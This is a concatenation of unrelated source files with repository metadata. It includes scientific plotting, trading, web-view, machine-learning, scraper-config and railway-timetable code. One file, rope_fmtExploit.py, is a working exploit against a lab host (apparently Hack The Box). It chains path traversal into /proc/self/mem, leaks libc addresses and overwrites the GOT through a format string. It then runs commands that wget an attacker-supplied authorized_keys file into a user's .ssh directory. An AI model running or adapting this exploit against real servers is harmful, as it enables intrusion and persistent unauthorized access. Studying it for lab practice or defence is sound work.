#lon4=118.
#lat3=6.
#wide=8. #grid の倍数に
#dire="brwest"
#sa
dire="sa"
lon3=-86.
lon4=-71.
lat3=-3.
wide=10.
length=lon4-lon3
lat4=lat3+length
nstart=int((lon3-lon1)/grid)
nend=int((lon4-lon1)/grid)
mstart=int((lat3-lat1)/grid)
mend=int((lat4-lat1)/grid)
widenum=int(wide/grid)+1
lon=np.arange(lon1,lon2+grid,grid)
lat=np.arange(lat1,lat2+grid,grid)
lonp=np.arange(lon3,lon4+grid,grid)
latp=np.arange(lat3,lat4+grid,grid)
msize,nsize=getsize(lon,lat)
mpsize,npsize=getsize(lonp,latp)
for i in range(1,2):
plotcp=np.zeros((npsize,mpsize))
hov=np.zeros((24,mpsize))
for hour in range(0,24):
lt=hour-local
if lt<0:
lt+=24
if lt>23:
lt-=24
plotdata=np.loadtxt("/home/kubotashu/kubota/labo/sakuzu/sakuzu/sakuzu36/plotdata_wh04_rv/"+"%02d"%lt+".dat")
#################
#CUT
################
#plotcp=plotdata[mstart:mend+1,nstart:nend+1]
for j in range(0,mpsize):
for k in range(0,widenum):
hov[hour,j]+=plotdata[mend-j-k,nstart+j-k]
hov[hour,j]=hov[hour,j]/widenum
#print np.shape(plotcp)
#print hour
hovp=np.vstack((hov,hov[0]))
print np.shape(hovp)
filename="plotdata/wh04/"+dire+"/hovphase"+"%d"%i+".dat"
print filename
#print np.shape(hovp)
np.savetxt(filename,hovp,delimiter=",")
###########################################################
| [
"noreply@github.com"
] | noreply@github.com |
7e91cea1d6c02d21774bddccf502f877e6aac5ae | 3798583928530b4c5366e2dace526a4ce3e0c9bd | /rqrobot/core/strategy_universe.py | 9f6c7cbcb319583c13b92cd86e0453a277ec07bd | [
"Apache-2.0"
] | permissive | luhouxiang/rqrobot | bc80a5458f8a8c0631e566d781db1497939b641f | 0b0094b0e2d061e628c570a06a7620e5fb48d342 | refs/heads/master | 2020-05-17T14:40:04.495201 | 2019-05-04T13:17:04 | 2019-05-04T13:17:04 | 183,768,782 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,974 | py | # -*- coding: utf-8 -*-
#
# Copyright 2017 Ricequant, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import six
import json
import copy
from rqrobot.events import EVENT, Event
from rqrobot.environment import Environment
from rqrobot.model.instrument import Instrument
class StrategyUniverse(object):
def __init__(self):
self._set = set()
Environment.get_instance().event_bus.prepend_listener(EVENT.AFTER_TRADING, self._clear_de_listed)
def get_state(self):
return json.dumps(sorted(self._set)).encode('utf-8')
def set_state(self, state):
l = json.loads(state.decode('utf-8'))
self.update(l)
def update(self, universe):
if isinstance(universe, (six.string_types, Instrument)):
universe = [universe]
new_set = set(universe)
if new_set != self._set:
self._set = new_set
Environment.get_instance().event_bus.publish_event(Event(EVENT.POST_UNIVERSE_CHANGED, universe=self._set))
def get(self):
return copy.copy(self._set)
def _clear_de_listed(self, event):
de_listed = set()
env = Environment.get_instance()
for o in self._set:
i = env.data_proxy.instruments(o)
if i.de_listed_date <= env.trading_dt:
de_listed.add(o)
if de_listed:
self._set -= de_listed
env.event_bus.publish_event(Event(EVENT.POST_UNIVERSE_CHANGED, universe=self._set))
| [
"luhouxiang@hotmail.com"
] | luhouxiang@hotmail.com |
20b19b2536c1fbeefe644e9d821ef833bc2bd42b | 4a11d12d4b3da1efca5638d552cdc9faf9850fbd | /web/views/ach.py | 9a153ef8d184963a71e60d2814b907dc8924ea25 | [
"MIT"
] | permissive | tjcsl/wedge | fc0c46a4bb1d3e993e44fbe58dc5b353a232b7cd | 69a7b0d3cfb5b35544a47522e736cac47fd815e6 | refs/heads/master | 2020-04-07T11:42:13.762935 | 2013-11-10T15:57:42 | 2013-11-10T15:57:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 329 | py | from web.auth import loginrequired
from web.ach import *
from flask import session, request, render_template
@loginrequired
def ach():
name = session["username"] if "username" not in request.args else request.args["username"]
ach = get_user_achievements(name)
return render_template("ach.html", name=name, ach=ach)
| [
"fwilson@fwilson.me"
] | fwilson@fwilson.me |
b48fc36d7a90ec6c3bce9e94507a3efc2825d9b0 | ce51279f51070a954054a28bdbdecde3aa1f182b | /Move Zeroes.py | c0b7e2cf77667832411213b3426cb2ca5f283d6f | [] | no_license | unswjasonhu/leetcode | bc060283fb9cb3d995710591588007d4a87fde2a | dd32ec3425f40461e62c58125e2e078dae236ee1 | refs/heads/master | 2016-08-08T23:54:10.542840 | 2016-01-21T05:00:07 | 2016-01-21T05:00:07 | 46,773,778 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 425 | py | __author__ = 'Jason'
class Solution(object):
def moveZeroes(self, nums):
"""
:type nums: List[int]
:rtype: void Do not return anything, modify nums in-place instead.
"""
for i in range(len(nums)):
j = 0
if nums[i] == 0:
nums.append(0)
j +=1
for item in range(j):
nums.remove(0)
print nums
| [
"jasonhu.au2"
] | jasonhu.au2 |
801c42a9cc2b11ec0ce7278cd4201251a3d8cf7d | 02f1f32827119f086baed04eb8db9ac230b6ba97 | /Classification/KNN/knn.py | 2e9bb85ba3f325dad8b705f7d51e5b366f3998fd | [] | no_license | HsiangHung/Machine_Learning_Note | 82182bcff2f67e9b933d447a384aa8ec7e52b53b | 300f2bba5edaca25e66dcce0c4edd3203c8f22fb | refs/heads/master | 2023-09-01T13:40:57.636906 | 2023-08-31T05:32:23 | 2023-08-31T05:32:23 | 163,471,072 | 4 | 4 | null | null | null | null | UTF-8 | Python | false | false | 1,620 | py | '''
sklearn: https://stackabuse.com/k-nearest-neighbors-algorithm-in-python-and-scikit-learn/
Python from scratch: https://machinelearningmastery.com/tutorial-to-implement-k-nearest-neighbors-in-python-from-scratch/
NOTE: we should standardize data if necessary
'''
import numpy as np
import heapq
class KnnClassifier(object):
def __init__(self, k=5):
self.X = None
self.y = None
self.neighbor = k
def fit(self, X, y):
self.X = X[:]
self.y = y[:]
def predict(self, Xtest):
preds = []
for data in Xtest:
heap = []
for i in range(len(self.X)):
heapq.heappush(heap, (self.distance(data, self.X[i]), self.y[i]))
# print (self.distance(data, self.X[i]))
pred = {0: 0, 1:0}
k = 0
while k < self.neighbor:
dist, y = heapq.heappop(heap)
if dist != 0.0:
pred[y] += 1
k += 1
preds.append(0 if pred[0] >= pred[1] else 1)
return preds
def distance(self, a, b):
return np.sqrt(sum([(a[i]-b[i])**2 for i in range(len(a))]))
X = [[2.7810836,2.550537003],
[1.465489372,2.362125076],
[3.396561688,4.400293529],
[7.627531214,2.759262235],
[5.332441248,2.088626775],
[6.922596716,1.77106367]]
y = [0,0,0,1,1,1]
knn = KnnClassifier(k=6)
knn.fit(X, y)
X_test = [[1.38807019,1.850220317],
[3.06407232,3.005305973],
[8.675418651,-0.242068655],
[7.673756466,3.508563011]]
y_test = [0,0,1,1]
y_pred = knn.predict(X_test)
print (y_pred) | [
"Hsiang.Hung2015@gmail.com"
] | Hsiang.Hung2015@gmail.com |
0d7725141ae936d59ae566697940703666446737 | 1f5022b8edfda8f1226a608cb0028e8e057704ce | /excript/app-comerciais-kivy/aulas/entradaDados.py | 56b87cfceba451818625686f075146f328708615 | [] | no_license | felipecechin/python | 75372545c96cb79826861dca40c8211e4108e687 | 194932b0e93947ba2ba17bdbcdf5dc11de98f195 | refs/heads/master | 2022-01-11T18:05:55.058248 | 2019-06-04T03:21:16 | 2019-06-04T03:21:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 128 | py | login = input("Login:")
senha = input("Senha:")
print("Login:",login,"senha:",senha)
print("Login: %s senha: %s" %(login,senha)) | [
"ficechin@hotmail.com"
] | ficechin@hotmail.com |
3e8fbc487395171405ee2db183f9bb360c8ad542 | 60c8d2e77bd7c4c646f33d09aca6cc2fae143c3d | /tools_SSD.py | 942be797a37d39410fa57fd0ab9fe9490d7bc377 | [] | no_license | dynamicguy/tools | 866eb881d601866b0a528613773763dfd4dec36c | e718ff9c118d2a9081d532929ba631be95627fcf | refs/heads/main | 2023-03-26T11:03:04.656851 | 2021-03-06T19:45:16 | 2021-03-06T19:45:16 | 345,179,890 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,608 | py | import numpy
import cv2
import tools_image
# ----------------------------------------------------------------------------------------------------------------------
import tools_YOLO
from keras.layers import Input
# ----------------------------------------------------------------------------------------------------------------------
def generate_colors(N):
return tools_YOLO.generate_colors(N)
# ----------------------------------------------------------------------------------------------------------------------
def get_markup(filename_in, boxes_yxyx, scores, classes):
return tools_YOLO.get_markup(filename_in, boxes_yxyx, scores, classes)
# ----------------------------------------------------------------------------------------------------------------------
def draw_and_save(
filename_out, image, boxes_yxyx, scores, classes, colors, class_names
):
return tools_YOLO.draw_and_save(
filename_out, image, boxes_yxyx, scores, classes, colors, class_names
)
# ----------------------------------------------------------------------------------------------------------------------
def get_true_boxes(filename, delim=" ", limit=10000):
with open(filename) as f:
lines = f.readlines()[1:limit]
list_filenames = [line.split(" ")[0] for line in lines]
filenames_dict = sorted(set(list_filenames))
true_boxes = []
for filename in filenames_dict:
local_boxes = []
for line in lines:
split = line.split(delim)
if split[0] == filename:
class_ID = int(split[5])
x_min, y_min, x_max, y_max = numpy.array(split[1:5]).astype(numpy.float)
local_boxes.append([class_ID, x_min, y_min, x_max, y_max])
true_boxes.append(numpy.array(local_boxes))
return true_boxes
# ----------------------------------------------------------------------------------------------------------------------
def get_images(foldername, filename, delim=" ", resized_target=None, limit=10000):
with open(filename) as f:
lines = f.readlines()[1:limit]
list_filenames = [line.split(" ")[0] for line in lines]
filenames_dict = sorted(set(list_filenames))
images = []
for filename in filenames_dict:
image = tools_image.rgb2bgr(cv2.imread(foldername + filename))
if resized_target is not None:
image = cv2.resize(image, resized_target)
images.append(image)
return numpy.array(images)
# ----------------------------------------------------------------------------------------------------------------------
| [
"nurul@ferdo.us"
] | nurul@ferdo.us |
36d6859f91412f1d9bc50c8d9093e25601f1b157 | 854b94d7be92582bd191a7cb63143a95e5b5c337 | /hyfetch/distros/postmarketos_small.py | 4dc2bd42a651c2a3c7f18c7ef7c07c17cd241449 | [
"MIT"
] | permissive | hykilpikonna/hyfetch | 673c0c999d0f3f542349824495ad6004f450ebac | 98863df16d70b030696f4b94080d114396320f35 | refs/heads/master | 2023-08-17T10:41:10.289997 | 2023-08-17T03:37:23 | 2023-08-17T03:37:23 | 479,913,941 | 447 | 78 | MIT | 2023-09-14T14:39:18 | 2022-04-10T04:38:15 | Shell | UTF-8 | Python | false | false | 325 | py | # This file is automatically generated. Please do not modify.
from . import AsciiArt
postmarketos_small = AsciiArt(match=r'''"postmarketos_small"''', color='2 7', ascii=r"""
${c1} /\
/ \
/ \
\__ \
/\__ \ _\
/ / \/ __
/ / ____/ \
/ \ \ \
/_____/ /________\
""")
| [
"me@hydev.org"
] | me@hydev.org |
2c8f4f7227f82dcabce679d0b612e3e0c4bebb05 | c3f23317487154ace20c9baf5eafc79c0dfac55a | /Rope/rope_fmtExploit.py | 926fff23a1aeddc70e49482f882a92e2bda37e28 | [] | no_license | gbrsh/htb_exploits | a54d946355966c733d6a6d6ddc7c95d6ab5ae4a6 | 36175b1a258f7fd246ff815cc29facebf10ae0a1 | refs/heads/main | 2023-02-15T17:59:17.023361 | 2021-01-18T13:38:08 | 2021-01-18T13:38:08 | 330,675,194 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,498 | py | import base64
import urllib
from struct import pack
from pwn import *
myip = "10.10.14.2"
host = "10.10.10.148"
got_base = ""
got_printf = ""
libc_printf = ""
libc_system = ""
got_puts = ""
def mapsExtract():
cPrm = "GET"
aPrm = "../../../../../proc/self/maps"
rPrm = "Range: bytes=0-9999"
payload = cPrm + " " + aPrm + "\n" + rPrm + "\n"
pwn = remote(host, 9999, level = 'error')
pwn.sendline(payload + "\n")
recv = pwn.recvline_contains("rw-p", "httpserver")
# print recv
return recv[:recv.find('-')]
def memExtract():
cPrm = "GET"
aPrm = "../../../../../proc/self/mem"
rPrm = "Range: bytes=" + str(int(got_printf, 16)) + "-" + str(int(got_printf, 16) + 3)
payload = cPrm + " " + aPrm + "\n" + rPrm + "\n"
pwn = remote(host, 9999, level = 'error')
pwn.sendline(payload + "\n")
recv = pwn.recvall()
recv = recv.splitlines()[-1][::-1]
return recv.encode('hex')
def exploitServ(comm):
#remote f7e2 2d10 - memExtract - 13e50
payload = ""
fmt_first = libc_system[6:]
fmt_second = libc_system[2:6]
faddr = int(fmt_first, 16) -8
saddr = int(fmt_second, 16) - int(fmt_first, 16)
if(comm == 1):
cPrm = "ping${IFS}-c${IFS}1${IFS}"+myip
if(comm == 2):
cPrm = "wget${IFS}http://" + myip +":8000/authorized_keys${IFS}-P${IFS}/home/john/.ssh/"
if(comm == 3):
cPrm = "chmod${IFS}600${IFS}/home/john/.ssh/authorized_keys"
#cPrm = "ls${IFS}-la${IFS}/home/john/.ssh|nc${IFS}10.10.15.144${IFS}8088"
aPrm = p32(int(got_puts, 16))
aPrm += p32(int(got_puts, 16) + 2)
aPrm += "%2553%24" + str(faddr) + "x" # -8
aPrm += "%2553%24n"
aPrm += "%2554%24" + str(saddr) + "x"
aPrm += "%2554%24n"
payload = cPrm + " " + aPrm
print " + Executing step " + str(comm) + "..."
pwn = remote("10.10.10.148", 9999, level = 'error')
pwn.sendline(payload + "\n")
recv = pwn.recvall()
if "not found" in recv:
print " + Done"
pwn.shutdown()
pwn.close()
print "[*] Connecting to " + host
got_base = mapsExtract()
print " + GOT Base Address = 0x" + got_base
got_printf = hex(int("0x"+got_base, 16) + 0x18)
print "[*] Extracting printf libc addr at: " + got_printf
libc_printf = memExtract()
print " + LIBC printf addr = 0x" + libc_printf
print "[*] Exploiting..."
libc_system = hex(int("0x"+libc_printf, 16) - 0x13e50)
print " + LIBC system addr = 0x" + libc_system
got_puts = hex(int("0x"+got_base, 16) + 0x48)
print " + GOT puts addr = 0x" + got_puts
exploitServ(1)
sleep(3)
exploitServ(2)
print "[*] Ready to connect!"
| [
"noreply@github.com"
] | noreply@github.com |
c86e29c92067ee462f7e3e49e7c314b4b5687ea7 | dd7766e4a31c6907ca77c448fe953d7d7e936501 | /account/urls.py | 73aeed4b606ef4c044a21546e84270d00394a5f3 | [] | no_license | Randomnation/blogV2 | 2ece1ad596e4699e63f42eab351837262c2baf5a | 5f7f54bab3fb811cc57b313a608e79329f31eb8c | refs/heads/master | 2021-04-06T11:14:52.398442 | 2018-03-30T02:33:39 | 2018-03-30T02:33:39 | 125,216,311 | 0 | 0 | null | 2021-03-30T04:33:50 | 2018-03-14T13:25:33 | Python | UTF-8 | Python | false | false | 905 | py | from django.urls import path, include
from django.contrib.auth.views import login, logout
from account import views
app_name = "account"
urlpatterns = [
path('login/', login, {'template_name': 'account/login.html'}, name='login'),
path('logout/', logout, {'template_name': 'account/logout.html'}, name='logout'),
path('register/', views.register, name='register'),
path('login_success/', views.login_success, name='login_success'),
path('logout_success/', views.logout_success, name='logout_success'),
path('register_success/', views.register_success, name='register_success'),
path('not_verified/', views.not_verified, name='not_verified'),
path('login_next_test/', views.login_next_test, name='login_next_test'),
path('verify/(?P<user>.*)/(?P<code>.*)/', views.verify, name='verify'),
path('verify/', views.verify, {'code': None, 'user': None}, name='verify')
] | [
"krammtacular@gmail.com"
] | krammtacular@gmail.com |
1f90a89e25da62b6b5d3becb16bd2ca8c3045f98 | c48d431c5b7ac7e242d1637b314dc6e13585724d | /for loop test.py | 283b801b84f3cfc00c5cce761570c8bd1dd254b3 | [] | no_license | tytim12/Test-Res | d5bb5b21a325b84ec1016eb68b0f2bbc058cda2f | 1b43897cb770c12ee59342146599d1a32888150d | refs/heads/master | 2021-09-10T09:30:53.365617 | 2018-03-23T15:41:46 | 2018-03-23T15:41:46 | 119,928,795 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 236 | py | def prime(max):
list = []
for num in range(2,max):
for n in range(2,num):
if num % n == 0:
break
else:
list.append(num)
return list
numList = prime(100)
print(numList) | [
"tanyuan@Dev.chngalaxy.com"
] | tanyuan@Dev.chngalaxy.com |
cd30dee9c2e39d4d74f5da68dd97c87656ac6d03 | ecd27923efba50703a7bfbfa2ba37a8cc78560ea | /automatic_scraper/config/bid/liriqing/shandong_taian_ggzy_config.py | bd234c5293803ff68ced61e5c97669fc19eb8d3a | [] | no_license | yougecn/work | fb691b072a736731083777e489712dee199e6c75 | 1b58525e5ee8a3bdecca87fdee35a80e93d89856 | refs/heads/master | 2022-03-03T19:14:17.234929 | 2018-04-17T12:29:19 | 2018-04-17T12:29:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,631 | py | # coding: utf-8
import time
import logging
import re
logger = logging.getLogger(__name__)
author = "liriqing"
web_title = u"泰安市公共资源交易网"
data_source = 'http://www.taggzyjy.com.cn'
start_urls = [
##政府
#招标
"http://www.taggzyjy.com.cn/Front/jyxx/075002/075002001/075002001001/",
"http://www.taggzyjy.com.cn/Front/jyxx/075002/075002001/075002001004/",
"http://www.taggzyjy.com.cn/Front/jyxx/075002/075002001/075002001005/",
"http://www.taggzyjy.com.cn/Front/jyxx/075002/075002001/075002001006/",
"http://www.taggzyjy.com.cn/Front/jyxx/075002/075002001/075002001007/",
#中标
"http://www.taggzyjy.com.cn/Front/jyxx/075002/075002002/075002002001/",
"http://www.taggzyjy.com.cn/Front/jyxx/075002/075002002/075002002004/",
"http://www.taggzyjy.com.cn/Front/jyxx/075002/075002002/075002002005/",
"http://www.taggzyjy.com.cn/Front/jyxx/075002/075002002/075002002006/",
"http://www.taggzyjy.com.cn/Front/jyxx/075002/075002002/075002002007/",
#更正
"http://www.taggzyjy.com.cn/Front/jyxx/075002/075002003/075002003001/",
"http://www.taggzyjy.com.cn/Front/jyxx/075002/075002003/075002003004/",
"http://www.taggzyjy.com.cn/Front/jyxx/075002/075002003/075002003005/",
"http://www.taggzyjy.com.cn/Front/jyxx/075002/075002003/075002003006/",
"http://www.taggzyjy.com.cn/Front/jyxx/075002/075002003/075002003007/"
]
db_config = {
'host': '127.0.0.1',
'port': 3306,
'user': 'root',
'password': 'asd123',
'database': 'bid_data',
'table': 'zhaotoubiao'
}
# 列表页模板
index_pattern = {
"_list": {'pattern': "//tr[@height='30']", 'type': 'xpath', 'target': 'html', 'custom_func_name': ''},
"_next_page": {'pattern': "//td[text() = '下页 >' and @onclick]", 'type': 'xpath', 'target': 'html', 'custom_func_name': ''},
"title": {'pattern': "//a[@target='_blank']", 'type': 'xpath', 'target': 'text', 'custom_func_name': ''},
"issue_time": {'pattern': "//td[@width='80']", 'type': 'xpath', 'target': 'text', 'custom_func_name': ''},
}
# 详情页模板
detail_pattern = {
"sc": {'pattern': "//td[@id='TDContent']/div[1]", 'type': 'xpath', 'target': 'clean_html', 'custom_func_name': ''},
}
def init(item):
"""初始化时执行"""
logger.info(u'init item: %s', item)
item['_web_title'] = item['web_title']
del item['web_title']
item['region']=u'山东-泰安市'
item['_delay_between_pages'] = 3
def process_list_item(list_element, item):
"""处理列表页元素
:param list_element: _list模板解析出的html元素
:param item:
获取列表页后,根据_list模板获取每一个详情html代码后执行
有些内容可在列表页获取,可自定义在此处理,如:
item['pub_date'] = pq(list_element).find('span').text()
"""
item['issue_time'] = int(time.mktime(time.strptime(item['issue_time'][1:-1], "%Y-%m-%d")))
if '075002001'in item['_current_start_url']:
item['bid_type']= 1
elif '075002002'in item['_current_start_url']:
item['bid_type']= 0
elif '075002003' in item['_current_start_url']:
item['bid_type'] = 2
# 停止翻页
# if item['_current_page'] == 10:
# item['_click_next'] = False
def process_detail_item(item):
"""处理详情页
:param item:
获取详情页信息,存入item后执行
可在此处理程序无法处理的情况
如详情页无法解析发布时间,需要使用正则表达式从content中提取等
"""
if len(item['sc']) > 0:
item['is_get'] = 1
else:
item['is_get'] = 0
| [
"iwechen123@gmail.com"
] | iwechen123@gmail.com |
6a754571b917d56a2e08e0f91d054b9346da7e34 | f3bca43b2e703408110cd405e469064442086a32 | /app/Router/ErrorHandling.py | 14b9c9dece1f89033b89ac78f30499bf16655061 | [] | no_license | Simon-whale/FastAPI | 37b40f3fd67d5219db809c73ab7981e6b216d278 | dd22a0a3bad03a6c463bf1b4babd2315d252d0f3 | refs/heads/master | 2023-05-29T16:36:00.894550 | 2021-06-14T18:56:32 | 2021-06-14T18:56:32 | 365,352,991 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 931 | py | from fastapi import APIRouter, HTTPException
from fastapi.responses import JSONResponse
from app.Models.Message import Message
from app.Models.Item import Item
router = APIRouter()
@router.get('/blowsup/{item_no}', tags=["Errors"])
def she_gonna_blow(item_no: int):
if item_no >= 100:
# Here on purpose we raise an exception if the ID is equal
# or greater too 100
raise HTTPException(status_code=404, detail="Id is not found")
return {"It didn't break it": id}
@router.get("/break/{item_id}", response_model=Item, responses={404: {"model": Message}}, tags=["Errors"])
def it_go_boom(item_no: int):
"""
This endpoint is showing that you can set a format for the response message and an error message
"""
if item_no == 100:
return {"id": "foo", "value": "It didn't go BOOM"}
else:
return JSONResponse(status_code=404, content={"message": "Item not found"})
| [
"83454878+Simon-whale@users.noreply.github.com"
] | 83454878+Simon-whale@users.noreply.github.com |
ea9fc8459914a36ea8f7d384de549505288b7582 | 7463892195fa479a41dad3029eb55fb5e5dbcaa8 | /Railway/railway_book/views.py | 94ca3dd03c7ebddcf1cc1430ba395476e88f42d9 | [] | no_license | Theskyspace/Monorail-DBMS-investo- | c613af02d822bc69d943aef995e2527d09bfb811 | beee5044ea9da1035f16722effb30d00e18b18db | refs/heads/main | 2023-02-20T13:08:22.828151 | 2021-01-20T04:50:23 | 2021-01-20T04:50:23 | 331,196,240 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 21,955 | py | from django.shortcuts import render,HttpResponse
from .models import search
file_in = open('search.txt','wt')
#BULLSHIT
CHEM_S = ['0600', '0622', '0644', '0706', '0728', '0750', '0812', '0834', '0856', '0918', '0940', '1002', '1024', '1046', '1108', '1130', '1152', '1214', '1236', '1258', '1320', '1342', '1404', '1426', '1448', '1510', '1532', '1554', '1616', '1638', '1700', '1722', '1744', '1806', '1828', '1850', '1912', '1934', '1956', '2018', '2040', '2102', '2124', '2146', '2208']
VNP_S = ['0603', '0625', '0647', '0709', '0731', '0753', '0815', '0837', '0859', '0921', '0943', '1005', '1027', '1049', '1111', '1133', '1155', '1217', '1239', '1301', '1323', '1345', '1407', '1429', '1451', '1513', '1535', '1557', '1619', '1641', '1703', '1725', '1747', '1809', '1831', '1853', '1915', '1937', '1959', '2021', '2043', '2105', '2127', '2149', '2211']
FER_S = ['0605', '0627', '0649', '0711', '0733', '0755', '0817', '0839', '0901', '0923', '0945', '1007', '1029', '1051', '1113', '1135', '1157', '1219', '1241', '1303', '1325', '1347', '1409', '1431', '1453', '1515', '1537', '1559', '1621', '1643', '1705', '1727', '1749', '1811', '1833', '1855', '1917', '1939', '2001', '2023', '2045', '2107', '2129', '2151', '2213']
BHARAT_S = ['0606', '0628', '0650', '0712', '0734', '0756', '0818', '0840', '0902', '0924', '0946', '1008', '1030', '1052', '1114', '1136', '1158', '1220', '1242', '1304', '1326', '1348', '1410', '1432', '1454', '1516', '1538', '1600', '1622', '1644', '1706', '1728', '1750', '1812', '1834', '1856', '1918', '1940', '2002', '2024', '2046', '2108', '2130', '2152', '2214']
MYSORE_S = ['0609', '0631', '0653', '0715', '0737', '0759', '0821', '0843', '0905', '0927', '0949', '1011', '1033', '1055', '1117', '1139', '1201', '1223', '1245', '1307', '1329', '1351', '1413', '1435', '1457', '1519', '1541', '1603', '1625', '1647', '1709', '1731', '1753', '1815', '1837', '1859', '1921', '1943', '2005', '2027', '2049', '2111', '2133', '2155', '2217']
BHAKTI_S = ['0614', '0636', '0658', '0720', '0742', '0804', '0826', '0848', '0910', '0932', '0954', '1016', '1038', '1100', '1122', '1144', '1206', '1228', '1250', '1312', '1334', '1356', '1418', '1440', '1502', '1524', '1546', '1608', '1630', '1652', '1714', '1736', '1758', '1820', '1842', '1904', '1926', '1948', '2010', '2032', '2054', '2116', '2138', '2200', '2222']
WADALA_S = ['0617', '0639', '0701', '0723', '0745', '0807', '0829', '0851', '0913', '0935', '0957', '1019', '1041', '1103', '1125', '1147', '1209', '1231', '1253', '1315', '1337', '1359', '1421', '1443', '1505', '1527', '1549', '1611', '1633', '1655', '1717', '1739', '1801', '1823', '1845', '1907', '1929', '1951', '2013', '2035', '2057', '2119', '2141', '2203', '2225']
GTB_S = ['0619', '0641', '0703', '0725', '0747', '0809', '0831', '0853', '0915', '0937', '0959', '1021', '1043', '1105', '1127', '1149', '1211', '1233', '1255', '1317', '1339', '1401', '1423', '1445', '1507', '1529', '1551', '1613', '1635', '1657', '1719', '1741', '1803', '1825', '1847', '1909', '1931', '1953', '2015', '2037', '2059', '2121', '2143', '2205', '2227']
ANTOP_S = ['0621', '0643', '0705', '0727', '0749', '0811', '0833', '0855', '0917', '0939', '1001', '1023', '1045', '1107', '1129', '1151', '1213', '1235', '1257', '1319', '1341', '1403', '1425', '1447', '1509', '1531', '1553', '1615', '1637', '1659', '1721', '1743', '1805', '1827', '1849', '1911', '1933', '1955', '2017', '2039', '2101', '2123', '2145', '2207', '2229']
ACHARYA_S = ['0624', '0646', '0708', '0730', '0752', '0814', '0836', '0858', '0920', '0942', '1004', '1026', '1048', '1110', '1132', '1154', '1216', '1238', '1300', '1322', '1344', '1406', '1428', '1450', '1512', '1534', '1556', '1618', '1640', '1702', '1724', '1746', '1808', '1830', '1852', '1914', '1936', '1958', '2020', '2042', '2104', '2126', '2148', '2210', '2232']
WADALAB_S = ['0629', '0651', '0713', '0735', '0757', '0819', '0841', '0903', '0925', '0947', '1009', '1031', '1053', '1115', '1137', '1159', '1221', '1243', '1305', '1327', '1349', '1411', '1433', '1455', '1517', '1539', '1601', '1623', '1645', '1707', '1729', '1751', '1813', '1835', '1857', '1919', '1941', '2003', '2025', '2047', '2109', '2131', '2153', '2215', '2237']
DADAR_S = ['0631', '0653', '0715', '0737', '0759', '0821', '0843', '0905', '0927', '0949', '1011', '1033', '1055', '1117', '1139', '1201', '1223', '1245', '1307', '1329', '1351', '1413', '1435', '1457', '1519', '1541', '1603', '1625', '1647', '1709', '1731', '1753', '1815', '1837', '1859', '1921', '1943', '2005', '2027', '2049', '2111', '2133', '2155', '2217', '2239']
NAIGAON_S = ['0634', '0656', '0718', '0740', '0802', '0824', '0846', '0908', '0930', '0952', '1014', '1036', '1058', '1120', '1142', '1204', '1226', '1248', '1310', '1332', '1354', '1416', '1438', '1500', '1522', '1544', '1606', '1628', '1650', '1712', '1734', '1756', '1818', '1840', '1902', '1924', '1946', '2008', '2030', '2052', '2114', '2136', '2158', '2220', '2242']
AMBEDKAR_S =['0638', '0700', '0722', '0744', '0806', '0828', '0850', '0912', '0934', '0956', '1018', '1040', '1102', '1124', '1146', '1208', '1230', '1252', '1314', '1336', '1358', '1420', '1442', '1504', '1526', '1548', '1610', '1632', '1654', '1716', '1738', '1800', '1822', '1844', '1906', '1928', '1950', '2012', '2034', '2056', '2118', '2140', '2202', '2224', '2246']
MINT_S = ['0641', '0703', '0725', '0747', '0809', '0831', '0853', '0915', '0937', '0959', '1021', '1043', '1105', '1127', '1149', '1211', '1233', '1255', '1317', '1339', '1401', '1423', '1445', '1507', '1529', '1551', '1613', '1635', '1657', '1719', '1741', '1803', '1825', '1847', '1909', '1931', '1953', '2015', '2037', '2059', '2121', '2143', '2205', '2227', '2249']
LOWER_S = ['0644', '0706', '0728', '0750', '0812', '0834', '0856', '0918', '0940', '1002', '1024', '1046', '1108', '1130', '1152', '1214', '1236', '1258', '1320', '1342', '1404', '1426', '1448', '1510', '1532', '1554', '1616', '1638', '1700', '1722', '1744', '1806', '1828', '1850', '1912', '1934', '1956', '2018', '2040', '2102', '2124', '2146', '2208', '2230', '2252']
SANT_S = ['0646', '0708', '0730', '0752', '0814', '0836', '0858', '0920', '0942', '1004', '1026', '1048', '1110', '1132', '1154', '1216', '1238', '1300', '1322', '1344', '1406', '1428', '1450', '1512', '1534', '1556', '1618', '1640', '1702', '1724', '1746', '1808', '1830', '1852', '1914', '1936', '1958', '2020', '2042', '2104', '2126', '2148', '2210', '2232', '2254']
CHEM_N = ['0647', '0709', '0731', '0753', '0815', '0837', '0859', '0921', '0943', '1005', '1027', '1049', '1111', '1133', '1155', '1217', '1239', '1301', '1323', '1345', '1407', '1429', '1451', '1513', '1535', '1557', '1619', '1641', '1703', '1725', '1747', '1809', '1831', '1853', '1915', '1937', '1959', '2021', '2043', '2105', '2127', '2149', '2211', '2233', '2255']
VNP_N = ['0644', '0706', '0728', '0750', '0812', '0834', '0856', '0918', '0940', '1002', '1024', '1046', '1108', '1130', '1152', '1214', '1236', '1258', '1320', '1342', '1404', '1426', '1448', '1510', '1532', '1554', '1616', '1638', '1700', '1722', '1744', '1806', '1828', '1850', '1912', '1934', '1956', '2018', '2040', '2102', '2124', '2146', '2208', '2230', '2252']
FER_N = ['0640', '0702', '0724', '0746', '0808', '0830', '0852', '0914', '0936', '0958', '1020', '1042', '1104', '1126', '1148', '1210', '1232', '1254', '1316', '1338', '1400', '1422', '1444', '1506', '1528', '1550', '1612', '1634', '1656', '1718', '1740', '1802', '1824', '1846', '1908', '1930', '1952', '2014', '2036', '2058', '2120', '2142', '2204', '2226', '2248']
